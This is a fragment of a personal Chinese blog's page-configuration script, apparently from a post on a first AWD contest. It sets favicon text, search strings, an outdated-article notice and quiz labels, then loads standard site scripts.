        path: `post/2024/2024/AWD初体验/`,
        favicon: {
        show: `MorIo24 的小破站~(ღ˘⌣˘ღ)~`,
        hide: `MorIo24 的小破站(｡í _ ì｡)`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.2.4/pace.min.js" async=""></script><script src="/js/siteInit.js?v=0.4.2" type="module" fetchpriority="high" defer=""></script></body></html>